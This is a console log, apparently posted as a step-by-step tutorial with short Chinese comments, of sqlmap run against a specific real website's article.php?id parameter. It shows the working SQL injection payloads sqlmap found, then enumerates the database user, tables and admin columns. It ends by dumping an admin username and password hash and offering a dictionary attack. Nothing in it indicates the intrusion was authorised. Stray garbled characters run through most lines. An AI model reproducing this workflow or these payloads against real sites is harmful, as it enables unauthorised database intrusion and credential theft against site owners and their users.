D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 z4 v* c$ H* @' q
ms "Mysql" --current-user /* 注解:获取当前用户名称
- h3 z. V- A1 `. F3 U sqlmap/0.9 - automatic SQL injection and database takeover tool7 }( J$ ]! M* L1 z+ \9 m
http://sqlmap.sourceforge.net starting at: 16:53:540 H4 e3 C: n, C, D' _
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 A0 j" \( G, d2 k0 |4 L& k
session file! M1 g% f) G. t' B" T; X( G
[16:53:54] [INFO] resuming injection data from session file
2 x/ i3 J; ?9 w8 E k, G[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 \3 q# R2 n" t4 L- E/ R
[16:53:54] [INFO] testing connection to the target url$ U4 f# x9 v! d' B
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. f( ]) D6 d; q% h4 n1 vsts:
- _/ K7 h7 Y' @: o* ?6 T) r---
/ Q i6 M0 v& }% @0 O! v; pPlace: GET# G6 }- c2 J# |
Parameter: id
2 E& C! F& v( n6 z Type: boolean-based blind
; s" o2 ?( d' k ?4 m2 ^/ t& [$ l Title: AND boolean-based blind - WHERE or HAVING clause1 A, W- Y- \5 M; n
Payload: id=276 AND 799=799
* W# a) y& w% N, c4 Y Type: error-based- g8 c1 Y. l. l9 A" w1 N9 Z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; p% ?' `( ^9 e) R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 T4 Q( L0 s/ T% u" E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 n' L% ?3 k4 d- M; W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" Q* a& A$ w N _0 h3 ~8 ?. X
Type: UNION query: k' b4 \9 A7 m1 h. {/ J
Title: MySQL UNION query (NULL) - 1 to 10 columns
J/ ~' p5 Y! ~$ D5 q0 [1 I3 s Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) c( p# u- O" h
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," l' p& g% K6 U# [. A
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ _( |' z L4 R Type: AND/OR time-based blind5 J M8 m0 z/ m' G9 F- t
Title: MySQL > 5.0.11 AND time-based blind
6 k1 W+ L& _& L. ?# {; b Payload: id=276 AND SLEEP(5)
* J- O8 T, H7 {0 `& C" d---9 F( A( D/ v! Y# D" @ x2 o, S
[16:53:55] [INFO] the back-end DBMS is MySQL/ v1 A7 J! T! Z& q2 K
web server operating system: Windows' z2 X& { y' z
web application technology: Apache 2.2.11, PHP 5.3.0
! p1 M" e( n( l2 j$ c$ D0 M3 P3 eback-end DBMS: MySQL 5.0+ s- r2 y A- o- Y9 P: r& U
[16:53:55] [INFO] fetching current user
: ?8 T3 ] Y# Scurrent user: 'root@localhost'
! x! H4 o8 X2 }[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% Z; W* g; R' qtput\www.wepost.com.hk' shutting down at: 16:53:583 b# j( M* k: @# T0 u
* A% f5 D: j" I; J
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* x1 m; Q' U+ E* j( ]4 v; Lms "Mysql" --current-db /*当前数据库
# K$ i3 C" q6 q; { sqlmap/0.9 - automatic SQL injection and database takeover tool* n$ z% Y* }3 I& [5 g
http://sqlmap.sourceforge.net starting at: 16:54:16
8 y' u. S4 p/ J( Z[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# Z- h+ P) I5 |- b/ g5 R* F
session file
4 ?6 `: |9 R, g* g[16:54:16] [INFO] resuming injection data from session file" f) x6 [' P8 V5 s' O O" t
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. _, Z7 U& X( Q' L! L
[16:54:16] [INFO] testing connection to the target url
1 S# a" C$ V: Q% Q0 v0 t4 t$ f% e# Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 \; k6 E4 w, ^* qsts:# i! G- z1 V p+ \( D" P4 [1 W
---
! U+ l0 I* V) M! l1 tPlace: GET
4 z6 `1 k" t1 ~" g sParameter: id4 E. D) U8 L+ w
Type: boolean-based blind
, N. x. C5 ?! [, |6 B6 G% Q Title: AND boolean-based blind - WHERE or HAVING clause
$ |, N8 H" k7 Q3 H2 t0 O: @ Payload: id=276 AND 799=799
$ I8 P X) A$ N Type: error-based- `% L3 W- h$ u& N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! p7 Q" U( J" h. Q8 y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) p8 V2 Z/ q& e9 A6 [# q5 i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 R' n+ ?. h+ L& {- ^* z5 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& I5 B: j: n' T4 h( l+ P8 p! S
Type: UNION query
$ I- S: J% `' R) f, ~ Title: MySQL UNION query (NULL) - 1 to 10 columns
. L. W3 t- Y" q6 t* T Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. d1 R3 t+ ~5 t. s, h* ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' q: l8 p- t8 K0 ?# J1 |" E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* r& X& |9 Q# d# F; e% j0 B Type: AND/OR time-based blind
) M: a6 y# Y" G2 C" A& H5 [ Title: MySQL > 5.0.11 AND time-based blind# `6 T& ^! L- a4 @' i! @. _+ O' w/ L
Payload: id=276 AND SLEEP(5)& G* R4 P0 W' K* y& O7 _
---
& A8 f! J3 Y3 n: z7 s[16:54:17] [INFO] the back-end DBMS is MySQL
0 W6 p$ s V/ k7 G- w; j9 _web server operating system: Windows6 b# y+ S$ h6 o; K- {
web application technology: Apache 2.2.11, PHP 5.3.0( R0 e- o; [- u- |
back-end DBMS: MySQL 5.0( |' m+ L8 U, |7 B( Z$ @
[16:54:17] [INFO] fetching current database
& S# N4 Y; E) Qcurrent database: 'wepost', u% [% A" u# w H7 X! p
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* p8 @9 H0 S7 q* q' Z `, c4 N
tput\www.wepost.com.hk' shutting down at: 16:54:18( s2 u6 l/ J0 K
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) T9 E2 |$ P, X$ w6 g7 m# [ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
7 A2 J; z4 |: e2 A7 x sqlmap/0.9 - automatic SQL injection and database takeover tool
6 d7 I# C' R# O0 M1 G4 T http://sqlmap.sourceforge.net starting at: 16:55:25- \% f5 Y" k0 ?& d$ G8 W/ [
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 n" z0 c) ?- X# {. A# b# ]0 h* V& x
session file9 |% C$ F! ^( j6 x- K+ k1 n
[16:55:25] [INFO] resuming injection data from session file
( Q- a# h% j, u( T5 K[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 j% c5 ]8 c1 }9 q[16:55:25] [INFO] testing connection to the target url6 @7 d/ [( N K c2 m" V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% O: Y9 Z2 R/ r4 d6 s: x% u6 Ests:# h0 w2 |3 ^2 p* K
--- J8 i5 [ g N6 P
Place: GET1 I+ Q x% @, f* L
Parameter: id
/ z) @# p1 y: ^6 z Type: boolean-based blind% r& Q9 s- ?8 I% g
Title: AND boolean-based blind - WHERE or HAVING clause# z# U+ ~7 f+ w# g
Payload: id=276 AND 799=799
7 O0 Y" C; \/ G Type: error-based
C3 t& k) {8 n+ B' h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% |/ J' c1 \% _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" _) Z9 `9 G3 T: i. b. d" v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( Z( t" B1 I0 {9 U: s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 w5 C9 g7 d$ M- k
Type: UNION query. M* M" o% F7 _- A+ M- c6 O
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ N! D' q! ]/ d, C8 E Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 z$ k' [/ c/ ?4 T" y) H9 k' ]
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- y- ]) ^# I/ v" g3 D" d/ yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J0 R& j4 H1 v: q
Type: AND/OR time-based blind
) V3 D- P, }+ f Title: MySQL > 5.0.11 AND time-based blind
; P+ l/ ~# W5 z4 d Payload: id=276 AND SLEEP(5)
& q( \% M# G6 _7 K---5 `# l$ i9 h7 j0 P0 \- {( L( ~
[16:55:26] [INFO] the back-end DBMS is MySQL P( Y/ X" A6 R: v9 L7 C) k
web server operating system: Windows
v4 [" O$ P2 ?web application technology: Apache 2.2.11, PHP 5.3.07 ~( R- w5 Z' } i6 l0 d
back-end DBMS: MySQL 5.0
- V& ~3 V7 V8 W% ][16:55:26] [INFO] fetching tables for database 'wepost'
, e9 z6 P5 W4 \' a[16:55:27] [INFO] the SQL query used returns 6 entries
" I& n# z+ P% _8 ~; R- hDatabase: wepost
. v0 r6 u2 q- _ S+ M+ a: D) p1 a7 Q[6 tables]; ?. k4 f8 s2 T% H2 t3 t
+-------------+
5 w0 C9 J2 S W| admin |
2 | f) }. P4 D' |$ G| article |3 {( L T, U% y; g
| contributor |3 q3 H4 t5 _- ?1 r; @3 ^
| idea |9 {$ F, F, ?. d- ~
| image |
- W- d- G: E F# \7 Q, B| issue |
- [, h; ?0 R. y# b2 n8 y8 J: @4 D+-------------+" Q* u. J" y6 F3 r) f# I9 z, k
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ }- Z5 ^+ M7 x" S
tput\www.wepost.com.hk' shutting down at: 16:55:33
- s/ T4 o' x4 I( ?! g0 T4 p$ d& I. K _
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- ~6 j. R% z Q" m, Y! Q8 q4 t7 hms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名( h7 ]8 _& Z$ R0 y% p0 H, g/ M
sqlmap/0.9 - automatic SQL injection and database takeover tool% v/ G: r5 Q9 M% i$ @# A' R
http://sqlmap.sourceforge.net starting at: 16:56:06) o; j2 j7 z1 i: q: h# g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 T6 i8 Y/ x6 S; l+ g+ {sts:; K& w% U( |9 e/ H- `6 t
---2 e/ \* H+ e b+ r6 t# R0 X% Q
Place: GET# P! l5 G$ p! w* h# G6 r# L
Parameter: id
' s- O$ w" I* A( q$ [7 |# j! B2 a Type: boolean-based blind
1 N; p6 i/ @7 k2 a( t Title: AND boolean-based blind - WHERE or HAVING clause) z9 O. ^# V; \5 A6 a
Payload: id=276 AND 799=7996 y f0 ?* q: Y( i. A
Type: error-based6 M. j( Y7 i1 Z6 m; K6 [$ f
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause \1 L! x8 J4 N I; A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 O* s% b) v& a# h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ S2 s% N: x; p3 v# f. }),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 R9 E9 k h% o9 t q Type: UNION query. D7 ^& w# P: {% s8 Z
Title: MySQL UNION query (NULL) - 1 to 10 columns% ^) f! O7 @; {! T$ v8 a
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) ]% R/ }1 Q4 t: w% T
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; }- p& a. Z0 \" e) xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" E+ x! }. t% }) M" z: n% m# [
Type: AND/OR time-based blind
2 H5 M- D! |! s+ r, M g Title: MySQL > 5.0.11 AND time-based blind
1 j# f# ]0 ^0 z. m' T i2 {, a Payload: id=276 AND SLEEP(5)
! _$ Y3 P( Q% n/ q5 ?---3 K7 v8 d/ X1 a; i0 @
web server operating system: Windows* C1 T O) g9 z7 h4 F5 v) g
web application technology: Apache 2.2.11, PHP 5.3.0+ K. L' x& d S* i% ?. \2 Z, X) a% e
back-end DBMS: MySQL 5.0
% U# J/ H+ A( _* e# a[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
e+ h8 b% o3 c& Pssion': wepost, wepost( ]9 z1 t& ] _5 j: u5 F
Database: wepost2 Q* P6 G9 S- z: d+ G, K
Table: admin
0 B- L0 q" c$ A. V0 z+ |9 h[4 columns]
* _# E2 s9 D ]2 {& _% x( r5 D+----------+-------------+" N: A$ _7 b$ i2 ]/ a8 d( A
| Column | Type |
+ C& p) D; l- P* }+----------+-------------+
8 w) q: O8 l) k| id | int(11) |% M6 I3 m. m2 k5 f1 @) |
| password | varchar(32) |5 ?; f4 q/ t8 b4 P' S, ?
| type | varchar(10) |% G/ k0 O# s7 f" e- F/ {& r
| userid | varchar(20) |
$ S7 C4 u2 m& J- q5 |+----------+-------------+0 f& N! D# E7 h6 X2 I6 N9 |2 h
shutting down at: 16:56:19
2 @0 H; X; l# C0 S7 F& H
& |6 Y9 e( Y4 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: W2 O) T1 H- j6 x
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
! p( x3 X+ h. O sqlmap/0.9 - automatic SQL injection and database takeover tool$ X0 K+ @4 T' K& z& {
http://sqlmap.sourceforge.net starting at: 16:57:14
q; |, }% ^5 w( Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 J+ c$ y! J, S8 \3 o
sts:
7 H/ V! M8 z+ T, t8 z' v- z5 O---) n+ c+ s6 I# ^4 a% I' j5 q/ C
Place: GET' Y) K' |' h# Q+ D/ t9 M' S
Parameter: id
1 h% c( Z" z6 M# Q' @ Type: boolean-based blind
* f& W1 v% s+ N, M3 o Title: AND boolean-based blind - WHERE or HAVING clause
* Z" d& k, e$ M! W Payload: id=276 AND 799=799
8 e. r F% y x, d Type: error-based
( f4 }% H& r" G Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 N1 u. H' H G5 G9 C4 v
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 v T" T# Q; x7 Q1 @5 [. B; S
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) O$ V7 W& d" p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' }9 j; `: w4 _. `9 c& u
Type: UNION query4 n' J, C) g/ J& S4 y _6 ?0 }
Title: MySQL UNION query (NULL) - 1 to 10 columns0 ~% e# T4 d/ _0 f3 f4 K4 o" o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 N p/ w( | l& Y6 ?) f" O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ a/ n( u% b0 {* M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## ]! j8 w/ j4 e$ Q+ P
Type: AND/OR time-based blind8 p% C7 F: t1 A+ d; Q, u
Title: MySQL > 5.0.11 AND time-based blind _/ ~& X9 O# U0 p$ d, O9 U
Payload: id=276 AND SLEEP(5)
, D; j }/ z1 b0 a3 x# }---+ i* _7 {/ |" y5 e8 k4 l
web server operating system: Windows3 u; G* K' A' _6 X3 ]6 X t
web application technology: Apache 2.2.11, PHP 5.3.0
0 q7 J/ {, x- _+ y) X) t/ h2 G+ _9 c! Yback-end DBMS: MySQL 5.0
2 A. o! g% V2 Drecognized possible password hash values. do you want to use dictionary attack o1 h E! v4 _/ _: c9 d
n retrieved table items? [Y/n/q] y0 y. r6 m) H$ _4 h( Y9 m5 n
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
- t; v9 z% ~; P' T/ e, ydo you want to use common password suffixes? (slow!) [y/N] y5 W! E7 \8 f* ^! Y8 c
Database: wepost
9 s+ D# ^' s% }3 L8 D1 T( bTable: admin
; e5 i8 n+ _8 @[1 entry]- j, ?/ G# q1 n
+----------------------------------+------------+; K* o8 N- q4 D! C
| password | userid |8 _3 X! K- ^, x! L3 e% z1 Q
+----------------------------------+------------+
) @% |( @7 P: Y+ X1 h8 V| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* M- w1 M5 r8 U5 l, g- b& d
+----------------------------------+------------+
3 m& u* @$ X- R shutting down at: 16:58:14
5 L+ U# v, p- [1 d+ ?
! v5 H* M# ?9 f# f2 xD:\Python27\sqlmap> |